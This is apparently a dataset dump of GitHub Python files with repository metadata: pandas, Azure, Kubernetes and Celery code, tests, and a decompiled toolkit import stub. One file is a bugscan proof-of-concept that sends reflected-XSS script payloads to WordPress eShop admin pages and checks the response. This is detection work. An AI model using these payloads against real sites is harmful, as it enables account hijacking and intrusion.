blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
03a090ef84ebad55c3aca6d91af5ba0140a7717e
|
0d8ee78f61660343e5feec41a53269dbf5585fa3
|
/Demo11/detect_nan.py
|
17ba54a1b6bb67f238e3c1cd79adac06a036808d
|
[] |
no_license
|
x-jeff/Python_Code_Demo
|
41b033f089fa19d8c63b2f26bf66ef379738c4ad
|
9bc458b08cfae0092e8f11a54031ca2e7017affc
|
refs/heads/master
| 2023-07-29T16:34:34.222620
| 2023-07-09T10:38:23
| 2023-07-09T10:38:23
| 176,306,727
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,509
|
py
|
import numpy as np
import pandas as pd
#使用np.nan表示缺失值
print(np.nan)
#构建一组含有缺失值的数据
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,140],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
#赋予列名
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
#判断是否存在缺失值
#检查第1行是否存在缺失值
print(df.loc[0].isnull().values.any())#返回False说明无缺失值
print(df[0:1].isnull().values.any())#另一种表达方式,也是检查第1行是否有缺失值
#检查第3列是否存在缺失值
print(df["Age"].isnull().values.any())#返回True说明存在缺失值
#判断整个DataFrame中是否存在缺失值
print(df.isnull().values.any())#返回True说明DataFrame中存在缺失值
#判断缺失值的具体位置
#判断第4行缺失值的具体位置
print(df.loc[3].isnull())#False为非缺失值,True为缺失值
print(df.loc[3].notnull())#False为缺失值,True为非缺失值
#判断第5列缺失值的具体位置
print(df["Weight"].isnull())
print(df["Weight"].notnull())
#判断整个DataFrame中是否存在缺失值
print(df.isnull())
print(df.notnull())
#同时检查所有列是否存在缺失值
print(df.isnull().any())
#统计缺失值的数量
#统计第2行缺失值的数量
print(df.loc[1].isnull().sum())
#统计第3列缺失值的数量
print(df["Age"].isnull().sum())
#整个DataFrame缺失值的数量
print(df.isnull().sum())#按列统计
print(df.isnull().sum().sum())#总计
|
[
"jeff.xinsc@gmail.com"
] |
jeff.xinsc@gmail.com
|
79ca884a8a20ea2993f277d5ff1ca22a268617bf
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/1193d0d2-1596.py
|
393dab9cbff6fc791ad1a466479311cea838e4a3
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 953
|
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities
From : http://www.exploit-db.com/exploits/36038/
"""
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payloads = ("wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E",
"wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E")
for payload in payloads:
target_url=arg + payload
code, head, res, errcode, _ = curl.curl(target_url)
if code == 200 and res.find('alert(/hello_topper/)') != -1:
security_info(verify_url + 'Wordpress eShop Reflected XSS')
if __name__ == '__main__':
import sys
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
4019557ed0cfcbf40d9968b2c7b943898e927a02
|
8b5d68c9398186cae64dbcc5b293d62d69e1921d
|
/src/python/knowledge_base/resolvers/external_uri_resolver.py
|
04e75899a585cc5c3a751bae5e325ba7624f7e60
|
[
"Apache-2.0"
] |
permissive
|
reynoldsm88/Hume
|
ec99df21e9b9651ec3cacfb8655a510ba567abc9
|
79a4ae3b116fbf7c9428e75a651753833e5bc137
|
refs/heads/master
| 2020-07-24T21:28:39.709145
| 2019-07-10T15:43:24
| 2019-07-10T15:43:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,032
|
py
|
from knowledge_base import KnowledgeBase
from kb_resolver import KBResolver
from utilities.awake_db import AwakeDB
class ExternalURIResolver(KBResolver):
def __init__(Self):
pass
def resolve(self, kb, awake_db):
print "ExternalURIResolver RESOLVE"
resolved_kb = KnowledgeBase()
super(ExternalURIResolver, self).copy_all(resolved_kb, kb)
if awake_db == "NA":
return resolved_kb
kb_entity_to_entity_group = dict()
for entgroupid, kb_entity_group in resolved_kb.get_entity_groups():
for kb_entity in kb_entity_group.members:
kb_entity_to_entity_group[kb_entity] = kb_entity_group
AwakeDB.initialize_awake_db(awake_db)
for entid, kb_entity in resolved_kb.entid_to_kb_entity.iteritems():
kb_entity_group = kb_entity_to_entity_group[kb_entity]
source_string = AwakeDB.get_source_string(kb_entity_group.actor_id)
if source_string is not None and source_string.find("dbpedia.org") != -1:
formatted_string = source_string.strip()
if source_string.startswith("<"):
source_string = source_string[1:]
if source_string.endswith(">"):
source_string = source_string[0:-1]
source_string = source_string.replace("dbpedia.org/resource", "en.wikipedia.org/wiki", 1)
kb_entity.properties["external_uri"] = source_string
# For countries, add geoname_id to properties
if (kb_entity_group.actor_id is not None
and "external_uri" not in kb_entity.properties
and "geonameid" not in kb_entity.properties):
geonameid = AwakeDB.get_geonameid_from_actorid(kb_entity_group.actor_id)
if geonameid is not None and len(str(geonameid).strip()) != 0:
kb_entity.properties["geonameid"] = str(geonameid)
return resolved_kb
|
[
"hqiu@bbn.com"
] |
hqiu@bbn.com
|
be3e5ac6319e9a7c5be95767c07575e031faad4e
|
06f7ffdae684ac3cc258c45c3daabce98243f64f
|
/vsts/vsts/service_endpoint/v4_1/models/__init__.py
|
47ad6d9342d71732fff5ee083b4be1aa50f569bb
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
kenkuo/azure-devops-python-api
|
7dbfb35f1c9637c9db10207824dd535c4d6861e8
|
9ac38a97a06ee9e0ee56530de170154f6ed39c98
|
refs/heads/master
| 2020-04-03T17:47:29.526104
| 2018-10-25T17:46:09
| 2018-10-25T17:46:09
| 155,459,045
| 0
| 0
|
MIT
| 2018-10-30T21:32:43
| 2018-10-30T21:32:42
| null |
UTF-8
|
Python
| false
| false
| 3,189
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .authentication_scheme_reference import AuthenticationSchemeReference
from .authorization_header import AuthorizationHeader
from .client_certificate import ClientCertificate
from .data_source import DataSource
from .data_source_binding import DataSourceBinding
from .data_source_binding_base import DataSourceBindingBase
from .data_source_details import DataSourceDetails
from .dependency_binding import DependencyBinding
from .dependency_data import DependencyData
from .depends_on import DependsOn
from .endpoint_authorization import EndpointAuthorization
from .endpoint_url import EndpointUrl
from .graph_subject_base import GraphSubjectBase
from .help_link import HelpLink
from .identity_ref import IdentityRef
from .input_descriptor import InputDescriptor
from .input_validation import InputValidation
from .input_value import InputValue
from .input_values import InputValues
from .input_values_error import InputValuesError
from .reference_links import ReferenceLinks
from .result_transformation_details import ResultTransformationDetails
from .service_endpoint import ServiceEndpoint
from .service_endpoint_authentication_scheme import ServiceEndpointAuthenticationScheme
from .service_endpoint_details import ServiceEndpointDetails
from .service_endpoint_execution_data import ServiceEndpointExecutionData
from .service_endpoint_execution_owner import ServiceEndpointExecutionOwner
from .service_endpoint_execution_record import ServiceEndpointExecutionRecord
from .service_endpoint_execution_records_input import ServiceEndpointExecutionRecordsInput
from .service_endpoint_request import ServiceEndpointRequest
from .service_endpoint_request_result import ServiceEndpointRequestResult
from .service_endpoint_type import ServiceEndpointType
__all__ = [
'AuthenticationSchemeReference',
'AuthorizationHeader',
'ClientCertificate',
'DataSource',
'DataSourceBinding',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'EndpointAuthorization',
'EndpointUrl',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValue',
'InputValues',
'InputValuesError',
'ReferenceLinks',
'ResultTransformationDetails',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionOwner',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
]
|
[
"tedchamb@microsoft.com"
] |
tedchamb@microsoft.com
|
0c0bbbb50d63c87813b656441d38ee608227be9a
|
8b7778d3c65f3688105e43718152da2c734ffa26
|
/3.Application_Test/cases/YBJZ_Test/Pay_Test.py
|
1fa5b3afab9534fdabc988bd759629709f20a863
|
[] |
no_license
|
zzworkaccount/OpenSourceLibrary
|
ab49b3f431c0474723dfad966ca09e29b07527eb
|
0f99f881eb8a1f4ddebbc5e7676289d01e6ffe19
|
refs/heads/main
| 2023-01-29T05:02:56.341004
| 2020-12-03T12:05:59
| 2020-12-03T12:05:59
| 315,920,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,123
|
py
|
# 支出
import unittest
from time import sleep
from lib.Tally.Action import Action
class Test_Pay(unittest.TestCase):
def setUp(self):
self.lg = Action()
self.driver = self.lg.driver
def test_pay(self ):
"""支出"""
self.lg.do_pay()
sleep(1)
count = 0
# 获取完成支付后的文本信息
pay_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[1])').text
num_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[2])').text
expect = 1
if '餐饮' in pay_text and '-520' == num_text:
count += 1
# 断言
# 框架提供的断言方法
self.assertEqual(count, expect)
|
[
"1434895836@qq.com"
] |
1434895836@qq.com
|
9552995971c569ff4f8f6eca60a9625ec1a652e2
|
3bae1ed6460064f997264091aca0f37ac31c1a77
|
/pyapps/sampleapp/impl/action/core/job/getXMLSchema/1_job_getXMLSchema.py
|
02e7f9e335610b4d5303567e07cd2003e0de3f8c
|
[] |
no_license
|
racktivity/ext-pylabs-core
|
04d96b80ac1942754257d59e91460c3a141f0a32
|
53d349fa6bee0ccead29afd6676979b44c109a61
|
refs/heads/master
| 2021-01-22T10:33:18.523799
| 2017-06-08T09:09:28
| 2017-06-08T09:09:28
| 54,314,984
| 0
| 0
| null | 2017-06-08T09:09:29
| 2016-03-20T11:55:01
|
Python
|
UTF-8
|
Python
| false
| false
| 147
|
py
|
__author__ = 'incubaid'
__priority__= 3
def main(q, i, p, params, tags):
params['result'] = ''
def match(q, i, params, tags):
return True
|
[
"devnull@localhost"
] |
devnull@localhost
|
fe4a67605c3ed774089ea1c726953328a7291e58
|
15581a76b36eab6062e71d4e5641cdfaf768b697
|
/LeetCode_30days_challenge/2020/May/First Bad Version.py
|
714967601f2406326187fa685495ac2b041efcf6
|
[] |
no_license
|
MarianDanaila/Competitive-Programming
|
dd61298cc02ca3556ebc3394e8d635b57f58b4d2
|
3c5a662e931a5aa1934fba74b249bce65a5d75e2
|
refs/heads/master
| 2023-05-25T20:03:18.468713
| 2023-05-16T21:45:08
| 2023-05-16T21:45:08
| 254,296,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
def firstBadVersion(n):
l = 0
r = n
while l <= r:
m = l + (r-l) // 2
if isBadVersion(m):
r = m-1
ans = m
else:
l = m+1
return ans
|
[
"mariandanaila01@gmail.com"
] |
mariandanaila01@gmail.com
|
48a0486d3ecc70762a4a94e5d1b121b090b5cb54
|
7357d367b0af4650ccc5b783b7a59090fdde47bb
|
/workalendar/usa/new_jersey.py
|
9bd916ca02e66d3026491150081c6ec359dc4184
|
[
"MIT"
] |
permissive
|
BarracudaPff/code-golf-data-python
|
fb0cfc74d1777c4246d56a5db8525432bf37ab1a
|
42e8858c2ebc6a061012bcadb167d29cebb85c5e
|
refs/heads/main
| 2023-05-29T05:52:22.856551
| 2020-05-23T22:12:48
| 2020-05-23T22:12:48
| 378,832,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register("US-NJ")
class NewJersey(UnitedStates):
"""New Jersey"""
include_good_friday = True
include_election_day_every_year = True
|
[
"sokolov.yas@gmail.com"
] |
sokolov.yas@gmail.com
|
85680cb8d5a23c4dd6047fa67e2115f85b2e1ca1
|
ca17bd80ac1d02c711423ac4093330172002a513
|
/find_leaves/FindLeaves.py
|
abce20d217199c2a3c79ac375c09f9dd3dcd5f44
|
[] |
no_license
|
Omega094/lc_practice
|
64046dea8bbdaee99d767b70002a2b5b56313112
|
e61776bcfd5d93c663b247d71e00f1b298683714
|
refs/heads/master
| 2020-03-12T13:45:13.988645
| 2018-04-23T06:28:32
| 2018-04-23T06:28:32
| 130,649,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import sys
sys.path.append("/Users/jinzhao/leetcode/")
from leetcode.common import *
class Solution(object):
def isLeaf(self, root):
if root:
return not root.left and not root.right
return False
def deleteLeaf(self, root, solution):
if root:
if root.left:
if self.isLeaf(root.left):
solution.append(root.left.val)
root.left = None
else:
self.deleteLeaf(root.left, solution)
if root.right:
if self.isLeaf(root.right):
solution.append(root.right.val)
root.right = None
else:
self.deleteLeaf(root.right, solution)
return solution
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
parent = TreeNode(0)
parent.right = root
solutionList = []
while parent.right:
#The line below could be removed for submission.
pretty_print_tree(parent.right, [])
solution = self.deleteLeaf(parent,[] )
if solution :
solutionList.append(solution)
return solutionList
if __name__ == "__main__":
sol = Solution()
root = build_tree_by_level([1,2,3,4,5,6,7])
#pretty_print_tree(root, [])
print sol.findLeaves(root)
|
[
"zhao_j1@denison.edu"
] |
zhao_j1@denison.edu
|
52f0bbbdbef2c865ea39664ab4a748fe1eddfdcd
|
325fde42058b2b82f8a4020048ff910cfdf737d7
|
/src/quantum/azext_quantum/commands.py
|
8dba4d309945625ee9a7487899150bcbc8cc9495
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
ebencarek/azure-cli-extensions
|
46b0d18fe536fe5884b00d7ffa30f54c7d6887d1
|
42491b284e38f8853712a5af01836f83b04a1aa8
|
refs/heads/master
| 2023-04-12T00:28:44.828652
| 2021-03-30T22:34:13
| 2021-03-30T22:34:13
| 261,621,934
| 2
| 5
|
MIT
| 2020-10-09T18:21:52
| 2020-05-06T01:25:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,417
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.commands import CliCommandType
from ._validators import validate_workspace_info, validate_target_info, validate_workspace_and_target_info, validate_workspace_info_no_location, validate_provider_and_sku_info
def transform_targets(providers):
def one(provider, target):
return OrderedDict([
('Provider', provider),
('Target-id', target['id']),
('Current Availability', target['currentAvailability']),
('Average Queue Time (seconds)', target['averageQueueTime'])
])
return [
one(provider['id'], target)
for provider in providers
for target in provider['targets']
]
def transform_job(result):
result = OrderedDict([
('Name', result['name']),
('Id', result['id']),
('Status', result['status']),
('Target', result['target']),
('Submission time', result['creationTime']),
('Completion time', result['endExecutionTime'])
])
return result
def transform_jobs(results):
def creation(job):
return job['creationTime']
return [transform_job(job) for job in sorted(results, key=creation, reverse=True)]
def transform_offerings(offerings):
def one(offering):
return OrderedDict([
('Provider Id', offering['id']),
('SKUs', ', '.join([s['id'] for s in offering['properties']['skus']])),
('Publisher ID', offering['properties']['managedApplication']['publisherId']),
('Offer ID', offering['properties']['managedApplication']['offerId'])
])
return [one(offering) for offering in offerings]
def transform_output(results):
def one(key, value):
repeat = round(20 * value)
barra = "\u2588" * repeat
return OrderedDict([
('Result', key),
('Frequency', f"{value:10.8f}"),
('', f"\u2590{barra:<22} |"),
])
if 'Histogram' in results:
histogram = results['Histogram']
# The Histogram serialization is odd entries are key and even entries values
# Make sure we have even entries
if (len(histogram) % 2) == 0:
table = []
items = range(0, len(histogram), 2)
for i in items:
key = histogram[i]
value = histogram[i + 1]
table.append(one(key, value))
return table
elif 'histogram' in results:
histogram = results['histogram']
return [one(key, histogram[key]) for key in histogram]
return results
def load_command_table(self, _):
workspace_ops = CliCommandType(operations_tmpl='azext_quantum.operations.workspace#{}')
job_ops = CliCommandType(operations_tmpl='azext_quantum.operations.job#{}')
target_ops = CliCommandType(operations_tmpl='azext_quantum.operations.target#{}')
offerings_ops = CliCommandType(operations_tmpl='azext_quantum.operations.offerings#{}')
with self.command_group('quantum workspace', workspace_ops) as w:
w.command('create', 'create')
w.command('delete', 'delete', validator=validate_workspace_info_no_location)
w.command('list', 'list')
w.show_command('show', validator=validate_workspace_info_no_location)
w.command('set', 'set', validator=validate_workspace_info)
w.command('clear', 'clear')
w.command('quotas', 'quotas', validator=validate_workspace_info)
with self.command_group('quantum target', target_ops) as t:
t.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_targets)
t.show_command('show', validator=validate_target_info)
t.command('set', 'set', validator=validate_target_info)
t.command('clear', 'clear')
with self.command_group('quantum job', job_ops) as j:
j.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_jobs)
j.show_command('show', validator=validate_workspace_info, table_transformer=transform_job)
j.command('submit', 'submit', validator=validate_workspace_and_target_info, table_transformer=transform_job)
j.command('wait', 'wait', validator=validate_workspace_info, table_transformer=transform_job)
j.command('output', 'output', validator=validate_workspace_info, table_transformer=transform_output)
with self.command_group('quantum', job_ops, is_preview=True) as q:
q.command('run', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
q.command('execute', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
with self.command_group('quantum offerings', offerings_ops) as o:
o.command('list', 'list_offerings', table_transformer=transform_offerings)
o.command('accept-terms', 'accept_terms', validator=validate_provider_and_sku_info)
o.command('show-terms', 'show_terms', validator=validate_provider_and_sku_info)
|
[
"noreply@github.com"
] |
ebencarek.noreply@github.com
|
a4abde74b1d48317424e2021da5db8a2da70ee28
|
14e36010b98895e08bd9edfcbc60dce30cbfb82b
|
/oneflow/python/test/modules/test_argmax.py
|
2f6e97661d6adf0677afe950e239b03a88c32db5
|
[
"Apache-2.0"
] |
permissive
|
duzhanyuan/oneflow
|
a9719befbfe112a7e2dd0361ccbd6d71012958fb
|
c6b47a3e4c9b5f97f5bc9f60bc1401313adc32c5
|
refs/heads/master
| 2023-06-21T20:31:55.828179
| 2021-07-20T16:10:02
| 2021-07-20T16:10:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,326
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
def _test_argmax_aixs_negative(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = -1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argmax(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_axis_postive(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_keepdims(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(axis, True)
np_out = np.argmax(input.numpy(), axis=axis)
np_out = np.expand_dims(np_out, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_dim_equal_none(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
of_out = input.argmax()
np_out = np.argmax(input.numpy().flatten(), axis=0)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgmax(flow.unittest.TestCase):
def test_argmax(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_argmax_aixs_negative,
_test_tensor_argmax,
_test_argmax_axis_postive,
_test_argmax_keepdims,
_test_argmax_dim_equal_none,
]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
duzhanyuan.noreply@github.com
|
aebfc07c7c0647c4cf50ffd3727a29c3a1a1bbf5
|
8dbb2a3e2286c97b1baa3ee54210189f8470eb4d
|
/kubernetes-stubs/client/models/v1_portworx_volume_source.pyi
|
b25062ce2dce6c1b5d1c6d991321863933c2432c
|
[] |
no_license
|
foodpairing/kubernetes-stubs
|
e4b0f687254316e6f2954bacaa69ff898a88bde4
|
f510dc3d350ec998787f543a280dd619449b5445
|
refs/heads/master
| 2023-08-21T21:00:54.485923
| 2021-08-25T03:53:07
| 2021-08-25T04:45:17
| 414,555,568
| 0
| 0
| null | 2021-10-07T10:26:08
| 2021-10-07T10:26:08
| null |
UTF-8
|
Python
| false
| false
| 565
|
pyi
|
import datetime
import typing
import kubernetes.client
class V1PortworxVolumeSource:
fs_type: typing.Optional[str]
read_only: typing.Optional[bool]
volume_id: str
def __init__(
self,
*,
fs_type: typing.Optional[str] = ...,
read_only: typing.Optional[bool] = ...,
volume_id: str
) -> None: ...
def to_dict(self) -> V1PortworxVolumeSourceDict: ...
class V1PortworxVolumeSourceDict(typing.TypedDict, total=False):
fsType: typing.Optional[str]
readOnly: typing.Optional[bool]
volumeID: str
|
[
"nikhil.benesch@gmail.com"
] |
nikhil.benesch@gmail.com
|
949ad3a1372e9c39832994758556504087695f10
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryquery/__init__.py
|
83cc81184494f05024215cd8ec32607526a0ff9d
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149
| 2018-03-08T01:22:49
| 2018-03-08T01:22:49
| 123,527,268
| 2
| 0
| null | 2018-03-02T03:48:31
| 2018-03-02T03:48:30
| null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: __init__.py
from errors import *
from types import *
from type_Params import *
from type_KeyInfo import *
from type_Subkey import *
from type_Value import *
|
[
"francisck@protonmail.ch"
] |
francisck@protonmail.ch
|
1e749a5b71a5aaeafceab5a016ab8fc7637dfd16
|
8d5c9369b0fb398c5a6078f6cac43ba8d67202fa
|
/bscan.spec
|
279792b27d524a1ad2c5efe84281796470e6b245
|
[
"MIT"
] |
permissive
|
raystyle/bscan
|
45191c2c0d26fe450c5d95567b83d47dfcb4c692
|
1edf0c0e738153a294d5cdc1b69d8f167152d5a2
|
refs/heads/master
| 2020-04-25T03:15:37.186913
| 2019-02-09T22:23:44
| 2019-02-09T22:23:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
spec
|
# -*- mode: python -*-
block_cipher = None
added_files = [
('bscan/configuration/', 'configuration',),
]
a = Analysis(
['bscan/__main__.py'],
binaries=[],
datas=added_files,
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False
)
pyz = PYZ(
a.pure,
a.zipped_data,
cipher=block_cipher
)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='bscan',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
runtime_tmpdir=None,
console=True,
icon='static/app.ico'
)
|
[
"welch18@vt.edu"
] |
welch18@vt.edu
|
e16d5a370589fd4fcb8ab0377701d48a1d1d0853
|
e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0
|
/venv/lib/python3.5/site-packages/celery/worker/autoscale.py
|
e21f73a0b61f250f23f6950d29d8adb767250aa1
|
[
"MIT"
] |
permissive
|
LavanyaRamkumar/Networking-app_Dynamic-Quiz
|
4d5540088b1e2724626dda8df0fd83442391b40f
|
4de8329845712864d3cc8e8b81cfce5a1207224d
|
refs/heads/master
| 2023-02-09T12:08:19.913354
| 2019-10-26T04:23:54
| 2019-10-26T04:23:54
| 173,337,916
| 1
| 1
|
MIT
| 2023-02-02T04:48:55
| 2019-03-01T16:56:13
|
Python
|
UTF-8
|
Python
| false
| false
| 4,883
|
py
|
# -*- coding: utf-8 -*-
"""Pool Autoscaling.
This module implements the internal thread responsible
for growing and shrinking the pool according to the
current autoscale settings.
The autoscale thread is only enabled if
the :option:`celery worker --autoscale` option is used.
"""
from __future__ import absolute_import, unicode_literals
import os
import threading
from time import sleep
from kombu.async.semaphore import DummyLock
from celery import bootsteps
from celery.five import monotonic
from celery.utils.log import get_logger
from celery.utils.threads import bgThread
from . import state
from .components import Pool
__all__ = ['Autoscaler', 'WorkerComponent']
logger = get_logger(__name__)
debug, info, error = logger.debug, logger.info, logger.error
AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30))
class WorkerComponent(bootsteps.StartStopStep):
"""Bootstep that starts the autoscaler thread/timer in the worker."""
label = 'Autoscaler'
conditional = True
requires = (Pool,)
def __init__(self, w, **kwargs):
self.enabled = w.autoscale
w.autoscaler = None
def create(self, w):
scaler = w.autoscaler = self.instantiate(
w.autoscaler_cls,
w.pool, w.max_concurrency, w.min_concurrency,
worker=w, mutex=DummyLock() if w.use_eventloop else None,
)
return scaler if not w.use_eventloop else None
def register_with_event_loop(self, w, hub):
w.consumer.on_task_message.add(w.autoscaler.maybe_scale)
hub.call_repeatedly(
w.autoscaler.keepalive, w.autoscaler.maybe_scale,
)
class Autoscaler(bgThread):
"""Background thread to autoscale pool workers."""
def __init__(self, pool, max_concurrency,
min_concurrency=0, worker=None,
keepalive=AUTOSCALE_KEEPALIVE, mutex=None):
super(Autoscaler, self).__init__()
self.pool = pool
self.mutex = mutex or threading.Lock()
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
self._last_scale_up = None
self.worker = worker
assert self.keepalive, 'cannot scale down too fast.'
def body(self):
with self.mutex:
self.maybe_scale()
sleep(1.0)
def _maybe_scale(self, req=None):
procs = self.processes
cur = min(self.qty, self.max_concurrency)
if cur > procs:
self.scale_up(cur - procs)
return True
